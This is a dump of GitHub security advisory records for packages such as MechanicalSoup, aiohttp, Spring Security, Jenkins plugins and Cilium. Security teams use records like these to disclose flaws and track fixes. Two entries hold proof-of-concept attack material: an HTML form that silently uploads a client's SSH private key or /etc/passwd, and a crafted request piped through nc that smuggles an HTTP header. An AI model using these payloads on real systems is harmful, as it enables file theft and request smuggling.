{'cwe_ids': ['CWE-440'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T19:08:10Z', 'nvd_published_at': None}
1.4.0
GHSA-rf76-whgp-fp56
2023-07-06T23:42:50Z
2023-07-06T21:14:59Z
null
['CVE-2023-31454']
Apache InLong vulnerable to Incorrect Permission Assignment for Critical Resource
Incorrect Permission Assignment for Critical Resource Vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong from 1.2.0 through 1.6.0. The attacker can bind any cluster, even if he is not the cluster owner. Users are advised to upgrade to Apache InLong 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7947 to solve it.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31454'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7947'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/nqt1tr6pbq8q4b033d7sg5gltx5pmjgl'}]
{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:42:50Z', 'nvd_published_at': None}
1.4.0
GHSA-p756-66w2-35g7
2023-07-20T13:59:18Z
2023-07-12T18:30:39Z
null
['CVE-2023-37961']
Jenkins Assembla Auth Plugin vulnerable to cross-site request forgery
Jenkins Assembla Auth Plugin 1.14 and earlier does not implement a state parameter in its OAuth flow, a unique and non-guessable value associated with each authentication request. This vulnerability allows attackers to trick users into logging in to the attacker’s account.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:assembla-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.14'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37961'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-2988'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:41Z', 'nvd_published_at': None}
1.4.0
GHSA-35gf-xjgf-96c5
2023-07-12T22:31:12Z
2023-07-12T18:30:38Z
null
['CVE-2023-37947']
Jenkins OpenShift Login Plugin vulnerable to Open Redirect
Jenkins OpenShift Login Plugin 1.1.0.227.v27e08dfb_1a_20 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins. This allows attackers to perform phishing attacks by having users go to a Jenkins URL that will forward them to a different site after successful authentication. OpenShift Login Plugin 1.1.0.230.v5d7030b_f5432 only redirects to relative (Jenkins) URLs.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.openshift.jenkins:openshift-login'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0.230.v5d7030b'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37947'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-2999'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:31:12Z', 'nvd_published_at': None}
1.4.0
GHSA-x456-3ccm-m6j4
2023-07-05T21:35:54Z
2023-07-05T21:35:54Z
null
['CVE-2023-34457']
MechanicalSoup vulnerable to malicious web server reading arbitrary files on client using file input inside HTML form
### Summary A malicious web server can read arbitrary files on the client using a `<input type="file" ...>` inside HTML form. ### Details This affects the extremely common pattern of form submission: ```python b = mechanicalsoup.StatefulBrowser() b.select_form(...) b.submit_selected() ``` The problem is with the code in `browser.Browser.get_request_kwargs`: ```python if tag.get("type", "").lower() == "file" and multipart: filepath = value if filepath != "" and isinstance(filepath, str): content = open(filepath, "rb") else: content = "" filename = os.path.basename(filepath) # If value is the empty string, we still pass it # for consistency with browsers (see # https://github.com/MechanicalSoup/MechanicalSoup/issues/250). files[name] = (filename, content) ``` The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like: ```html <html><body> <form method="post" enctype="multipart/form-data"> <input type="text" name="greeting" value="hello" /> <input type="file" name="evil" value="/home/user/.ssh/id_rsa" /> </form> </body></html> ``` then upon `.submit_selected()` the mechanicalsoup browser will happily send over the contents of your SSH private key. ### PoC ```python import attr import mechanicalsoup import requests class NevermindError(Exception): pass @attr.s class FakeSession: session = attr.ib() headers = property(lambda self: self.session.headers) def request(self, *args, **kwargs): print("requested", args, kwargs) raise NevermindError # don't actually send request def demonstrate(inputs=None): b = mechanicalsoup.StatefulBrowser(FakeSession(requests.Session())) b.open_fake_page("""\ <html><body> <form method="post" enctype="multipart/form-data"> <input type="text" name="greeting" value="hello" /> <input type="file" name="evil" value="/etc/passwd" /> <input type="file" name="second" /> </form> </body></html> """, url="http://127.0.0.1:9/") b.select_form() if inputs is not None: b.form.set_input(inputs) try: b.submit_selected() except NevermindError: pass # %% # unpatched demonstrate() # OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('passwd', <_io.BufferedReader name='/etc/passwd'>), 'second': ('', '')}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hello')]} # %% # with the patch, this now works. users MUST open the file manually and # use browser.set_input() using the file object. demonstrate({"greeting": "hiya", "evil": open("/etc/hostname", "rb").name, "second": open("/dev/null", "rb")}) # OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('hostname', <_io.BufferedReader name='/etc/hostname'>), 'second': ('null', <_io.BufferedReader name='/dev/null'>)}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hiya')]} # %% # with the patch, this raises a ValueError with a helpful string demonstrate({"evil": "/etc/hostname"}) # %% # with the patch, we silently send no file if a malicious server tries the attack: demonstrate() ``` ### Suggested patch ```diff diff --git a/mechanicalsoup/browser.py b/mechanicalsoup/browser.py index 285f8bb..68bc65e 100644 --- a/mechanicalsoup/browser.py +++ b/mechanicalsoup/browser.py @@ -1,7 +1,8 @@ +import io import os import tempfile import urllib import weakref import webbrowser import bs4 @@ -227,15 +228,21 @@ class Browser: value = tag.get("value", "") # If the enctype is not multipart, the filename is put in # the form as a text input and the file is not sent. if tag.get("type", "").lower() == "file" and multipart: filepath = value if filepath != "" and isinstance(filepath, str): - content = open(filepath, "rb") + content = getattr(tag, "_mechanicalsoup_file", None) + if content is False: + raise ValueError( + """From v1.3.0 onwards, you must pass an open file object directly, for example using `form.set_input({"name": open("/path/to/filename", "rb")})`. This change is to mitigate a security vulnerability where a malicious web server could read arbitrary files from the client.""" + ) + elif not isinstance(content, io.IOBase): + content = "" else: content = "" filename = os.path.basename(filepath) # If value is the empty string, we still pass it # for consistency with browsers (see # https://github.com/MechanicalSoup/MechanicalSoup/issues/250). files[name] = (filename, content) diff --git a/mechanicalsoup/form.py b/mechanicalsoup/form.py index a67195c..82f6015 100644 --- a/mechanicalsoup/form.py +++ b/mechanicalsoup/form.py @@ -1,8 +1,9 @@ import copy +import io import warnings from bs4 import BeautifulSoup from .utils import LinkNotFoundError @@ -64,15 +65,24 @@ class Form: give it the value ``password``. """ for (name, value) in data.items(): i = self.form.find("input", {"name": name}) if not i: raise InvalidFormMethod("No input field named " + name) - i["value"] = value + + if isinstance(value, io.IOBase): + # Store the actual file object for <input type="file"> + i._mechanicalsoup_file = value + i["value"] = value.name + else: + # We set `_mechanicalsoup_file` to `False` so that we can + # check for deprecated use of the API. + i._mechanicalsoup_file = False + i["value"] = value def uncheck_all(self, name): """Remove the *checked*-attribute of all input elements with a *name*-attribute given by ``name``. """ for option in self.form.find_all("input", {"name": name}): if "checked" in option.attrs: @@ -257,20 +267,20 @@ class Form: .. code-block:: python form.set("login", username) form.set("password", password) form.set("eula-checkbox", True) Example: uploading a file through a ``<input type="file" - name="tagname">`` field (provide the path to the local file, + name="tagname">`` field (provide an open file object, and its content will be uploaded): .. code-block:: python - form.set("tagname", path_to_local_file) + form.set("tagname", open(path_to_local_file, "rb")) """ for func in ("checkbox", "radio", "input", "textarea", "select"): try: getattr(self, "set_" + func)({name: value}) return except InvalidFormMethod: ``` ### Impact All users of MechanicalSoup's form submission are affected, unless they took very specific (and manual) steps to reset HTML form field values.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'MechanicalSoup'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '1.3.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/MechanicalSoup/MechanicalSoup/security/advisories/GHSA-x456-3ccm-m6j4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34457'}, {'type': 'WEB', 'url': 'https://github.com/MechanicalSoup/MechanicalSoup/commit/d57c4a269bba3b9a0c5bfa20292955b849006d9e'}, {'type': 'PACKAGE', 'url': 'https://github.com/MechanicalSoup/MechanicalSoup'}, {'type': 'WEB', 'url': 'https://github.com/MechanicalSoup/MechanicalSoup/releases/tag/v1.3.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/mechanicalsoup/PYSEC-2023-108.yaml'}]
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T21:35:54Z', 'nvd_published_at': None}
1.4.0
GHSA-4x5h-xmv4-99wx
2023-07-06T22:04:03Z
2023-07-06T19:24:13Z
null
['CVE-2023-27987']
Apache Linkis Authentication Bypass vulnerability
In Apache Linkis <=1.3.1, due to the default token generated by Linkis Gateway deployment being too simple, it is easy for attackers to obtain the default token for the attack. Generation rules should add random values. We recommend users upgrade the version of Linkis to version 1.3.2 And modify the default token value. You can refer to Token authorization.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.linkis:linkis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27987'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/linkis'}, {'type': 'WEB', 'url': 'https://linkis.apache.org/docs/latest/auth/token'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/3cr1cz3210wzwngldwrqzm43vwhghp0p'}]
{'cwe_ids': ['CWE-294'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T22:04:03Z', 'nvd_published_at': '2023-04-10T08:15:00Z'}
1.4.0
GHSA-3h4m-m55v-gx4m
2023-07-21T18:22:19Z
2023-07-12T12:31:36Z
null
['CVE-2023-36543']
Apache Airflow Improper Input Validation vulnerability
Apache Airflow, versions before 2.6.3, has a vulnerability where an authenticated user can use crafted input to make the current request hang. It is recommended to upgrade to a version that is not affected
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36543'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/32060'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/116e607ddcb32480e57c342f48226545ac6fc315'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-106.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/tokfs980504ylgk3cv3hjlnrtbv4tng4'}]
{'cwe_ids': ['CWE-1333', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:30:47Z', 'nvd_published_at': None}
1.4.0
GHSA-4vpr-xfrp-cj64
2023-07-27T16:16:27Z
2023-07-18T18:30:36Z
null
['CVE-2023-34035']
Spring Security's authorization rules can be misconfigured when using multiple servlets
Spring Security versions 5.8 prior to 5.8.5, 6.0 prior to 6.0.5, and 6.1 prior to 6.1.2 could be susceptible to authorization rule misconfiguration if the application uses requestMatchers(String) and multiple servlets, one of them being Spring MVC’s DispatcherServlet. (DispatcherServlet is a Spring MVC component that maps HTTP endpoints to methods on @Controller-annotated classes.) Specifically, an application is vulnerable when all of the following are true: * Spring MVC is on the classpath * Spring Security is securing more than one servlet in a single application (one of them being Spring MVC’s DispatcherServlet) * The application uses requestMatchers(String) to refer to endpoints that are not Spring MVC endpoints An application is not vulnerable if any of the following is true: * The application does not have Spring MVC on the classpath * The application secures no servlets other than Spring MVC’s DispatcherServlet * The application uses requestMatchers(String) only for Spring MVC endpoints
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.8.0'}, {'fixed': '5.8.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34035'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-security-samples/commit/4e3bec904a5467db28ea33e25ac9d90524b53d66'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-security/commit/bb46a5427005e33e637b15948de8adae244ce547'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-security/commit/df239b6448ccf138b0c95b5575a88f33ac35cd9a'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-security-samples/tree/main/servlet/java-configuration/authentication/preauth'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-34035'}]
{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-19T22:10:34Z', 'nvd_published_at': None}
1.4.0
GHSA-j2cr-jc39-wpx5
2023-07-07T18:34:27Z
2023-07-07T18:34:27Z
null
[]
Barberry Security Advisory - regarding x/auth periodic vesting accounts
### Impact In `PeriodicVestingAccount`, defined in `x/auth`, an attacker can initialize a victim's account as a malicious vesting account, which allows deposits but does not allow withdrawals. When the user then deposits funds into their account, those funds are locked forever, and the user is not able to withdraw them. ### Patches \>= v0.46.13 for Cosmos SDK v0.46.x \>= v0.47.3 for Cosmos SDK v0.47.x If a network backported periodic vesting accounts to earlier versions of the SDK, those networks are affected too. ### Workarounds There is no workaround for this issue. Upgrade immediately. ### References * Patched versions release notes: [v0.47.3](https://github.com/cosmos/cosmos-sdk/blob/cfc757dc5043fb2758c47c146d2912fd010c1a45/RELEASE_NOTES.md#cosmos-sdk-v0473-release-notes), [v0.46.13](https://github.com/cosmos/cosmos-sdk/blob/d4b7164de5d8391e6aa644d8ea84e07396dd9653/RELEASE_NOTES.md#cosmos-sdk-v04613-release-notes). * [Forum Post](https://forum.cosmos.network/t/cosmos-sdk-security-advisory-barberry/10825)
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.46.0'}, {'fixed': '0.46.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.46.12'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.47.0'}, {'fixed': '0.47.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.47.2'}}]
[{'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/security/advisories/GHSA-j2cr-jc39-wpx5'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/pull/16466'}, {'type': 'WEB', 'url': 'https://forum.cosmos.network/t/cosmos-sdk-security-advisory-barberry/10825'}, {'type': 'PACKAGE', 'url': 'https://github.com/cosmos/cosmos-sdk'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/blob/cfc757dc5043fb2758c47c146d2912fd010c1a45/RELEASE_NOTES.md#cosmos-sdk-v0473-release-notes'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/blob/d4b7164de5d8391e6aa644d8ea84e07396dd9653/RELEASE_NOTES.md#cosmos-sdk-v04613-release-notes'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T18:34:27Z', 'nvd_published_at': None}
1.4.0
GHSA-w745-xjqx-7wp8
2023-07-06T21:49:11Z
2023-07-06T19:24:11Z
null
['CVE-2020-36664']
Artesãos SEOTools Open Redirect vulnerability
A vulnerability has been found in Artesãos SEOTools up to and including version 0.17.1. This vulnerability affects the function setTitle of the file SEOMeta.php. The manipulation of the argument title leads to open redirect. Upgrading to version 0.17.2 is able to address this issue. The name of the patch is ca27cd0edf917e0bc805227013859b8b5a1f01fb. It is recommended to upgrade the affected component.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'artesaos/seotools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36664'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/pull/201'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/commit/ca27cd0edf917e0bc805227013859b8b5a1f01fb'}, {'type': 'PACKAGE', 'url': 'https://github.com/artesaos/seotools'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/releases/tag/v0.17.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.222232'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.222232'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:49:11Z', 'nvd_published_at': '2023-03-04T17:15:00Z'}
1.4.0
GHSA-8699-h45g-7hm8
2023-08-08T21:49:34Z
2023-07-06T19:24:04Z
null
['CVE-2022-43695']
Concrete CMS Cross-site Scripting vulnerability
Concrete CMS (formerly concrete5) below 8.5.10 and between 9.0.0 and 9.1.2 is vulnerable to Stored Cross-Site Scripting (XSS) in dashboard/system/express/entities/associations because Concrete CMS allows association with an entity name that doesn’t exist or, if it does exist, contains XSS since it was not properly sanitized. Remediate by updating to Concrete CMS 9.1.3+ or 8.5.10+.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.10'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.1.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43695'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/8510-release-notes'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/913-release-notes'}, {'type': 'PACKAGE', 'url': 'https://github.com/concretecms'}, {'type': 'WEB', 'url': 'https://github.com/concretecms/concretecms/releases/8.5.10'}, {'type': 'WEB', 'url': 'https://github.com/concretecms/concretecms/releases/9.1.3'}, {'type': 'WEB', 'url': 'https://www.concretecms.org/about/project-news/security/concrete-cms-security-advisory-2022-10-31'}]
{'cwe_ids': ['CWE-77', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:34:29Z', 'nvd_published_at': '2022-11-14T23:15:00Z'}
1.4.0
GHSA-524r-w8fx-hqg3
2023-07-20T18:59:02Z
2023-07-10T18:30:49Z
null
['CVE-2023-3565']
TeamPass Cross-site Scripting vulnerability
Cross-site Scripting (XSS) - Generic in GitHub repository nilsteampassnet/teampass prior to 3.0.10.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.10'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3565'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/820bb49a362a566c9038e4a3048b26d654babb0e'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/fcf46e1f-2ab6-4057-9d25-cf493ab09530'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:52:43Z', 'nvd_published_at': None}
1.4.0
GHSA-45c4-8wx5-qw6w
2023-07-20T14:52:00Z
2023-07-20T14:52:00Z
null
['CVE-2023-37276']
aiohttp.web.Application vulnerable to HTTP request smuggling via llhttp HTTP request parser
### Impact aiohttp v3.8.4 and earlier are [bundled with llhttp v6.0.6](https://github.com/aio-libs/aiohttp/blob/v3.8.4/.gitmodules) which is vulnerable to CVE-2023-30589. The vulnerable code is used by aiohttp for its HTTP request parser when available which is the default case when installing from a wheel. This vulnerability only affects users of aiohttp as an HTTP server (ie `aiohttp.Application`), you are not affected by this vulnerability if you are using aiohttp as an HTTP client library (ie `aiohttp.ClientSession`). ### Reproducer ```python from aiohttp import web async def example(request: web.Request): headers = dict(request.headers) body = await request.content.read() return web.Response(text=f"headers: {headers} body: {body}") app = web.Application() app.add_routes([web.post('/', example)]) web.run_app(app) ``` Sending a crafted HTTP request will cause the server to misinterpret one of the HTTP header values leading to HTTP request smuggling. ```console $ printf "POST / HTTP/1.1\r\nHost: localhost:8080\r\nX-Abc: \rxTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\n0\r\n\r\n" \ | nc localhost 8080 Expected output: headers: {'Host': 'localhost:8080', 'X-Abc': '\rxTransfer-Encoding: chunked'} body: b'' Actual output (note that 'Transfer-Encoding: chunked' is an HTTP header now and body is treated differently) headers: {'Host': 'localhost:8080', 'X-Abc': '', 'Transfer-Encoding': 'chunked'} body: b'A' ``` ### Patches Upgrade to the latest version of aiohttp to resolve this vulnerability. It has been fixed in v3.8.5: [`pip install aiohttp >= 3.8.5`](https://pypi.org/project/aiohttp/3.8.5/) ### Workarounds If you aren't able to upgrade you can reinstall aiohttp using `AIOHTTP_NO_EXTENSIONS=1` as an environment variable to disable the llhttp HTTP request parser implementation. The pure Python implementation isn't vulnerable to request smuggling: ```console $ python -m pip uninstall --yes aiohttp $ AIOHTTP_NO_EXTENSIONS=1 python -m pip install --no-binary=aiohttp --no-cache aiohttp ``` ### References * https://nvd.nist.gov/vuln/detail/CVE-2023-30589 * https://hackerone.com/reports/2001873
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'aiohttp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.8.4'}}]
[{'type': 'WEB', 'url': 'https://github.com/aio-libs/aiohttp/security/advisories/GHSA-45c4-8wx5-qw6w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37276'}, {'type': 'WEB', 'url': 'https://github.com/aio-libs/aiohttp/commit/9337fb3f2ab2b5f38d7e98a194bde6f7e3d16c40'}, {'type': 'WEB', 'url': 'https://github.com/aio-libs/aiohttp/commit/9c13a52c21c23dfdb49ed89418d28a5b116d0681'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/2001873'}, {'type': 'PACKAGE', 'url': 'https://github.com/aio-libs/aiohttp'}, {'type': 'WEB', 'url': 'https://github.com/aio-libs/aiohttp/blob/v3.8.4/.gitmodules'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2023-120.yaml'}]
{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-20T14:52:00Z', 'nvd_published_at': None}
1.4.0
GHSA-gj2r-phwg-6rww
2023-09-27T15:42:11Z
2023-09-26T18:00:22Z
null
['CVE-2023-39347']
Kubernetes users may update Pod labels to bypass network policy
### Impact An attacker with the ability to update pod labels can cause Cilium to apply incorrect network policies. This issue arises due to the fact that on pod update, Cilium incorrectly uses user-provided pod labels to select the policies which apply to the workload in question. This can affect: * Cilium network policies that use the namespace, service account or cluster constructs to restrict traffic * Cilium clusterwide network policies that use Cilium namespace labels to select the Pod * Kubernetes network policies Non-existent construct names can be provided, which bypass all network policies applicable to the construct. For example, providing a pod with a non-existent namespace as the value of the `io.kubernetes.pod.namespace` label results in none of the namespaced CiliumNetworkPolicies applying to the pod in question. This attack requires the attacker to have [Kubernetes API Server access](https://docs.cilium.io/en/latest/security/threat-model/#kubernetes-api-server-attacker), as described in the Cilium Threat Model. ### Patches This issue affects: - Cilium <= v1.14.1 - Cilium <= v1.13.6 - Cilium <= v1.12.13 This issue has been resolved in: - Cilium v1.14.2 - Cilium v1.13.7 - Cilium v1.12.14 ### Workarounds An admission webhook can be used to prevent pod label updates to the `k8s:io.kubernetes.pod.namespace` and `io.cilium.k8s.policy.*` keys. ### Acknowledgements The Cilium community has worked together with members of Palantir and Isovalent to prepare these mitigations. Special thanks to @odinuge for reporting this issue and to @nebril for the fix. ### For more information If you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack). If you think you have found a vulnerability in Cilium, we strongly encourage you to report it to our private security mailing list – [security@cilium.io](mailto:security@cilium.io) – first, before disclosing them in any public forums. This is a private mailing list where only members of the Cilium internal security team are subscribed to, and is treated as top priority.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.13.6'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '1.14.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.14.1'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.12.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.12.13'}}]
[{'type': 'WEB', 'url': 'https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39347'}, {'type': 'WEB', 'url': 'https://docs.cilium.io/en/latest/security/threat-model/#kubernetes-api-server-attacker'}, {'type': 'PACKAGE', 'url': 'https://github.com/cilium/cilium'}]
{'cwe_ids': ['CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-26T18:00:22Z', 'nvd_published_at': None}
1.4.0
GHSA-h3hv-63q5-jgpr
2023-09-12T19:57:06Z
2023-09-12T19:57:06Z
null
['CVE-2023-36799']
Microsoft Security Advisory CVE-2023-36799: .NET Denial of Service Vulnerability
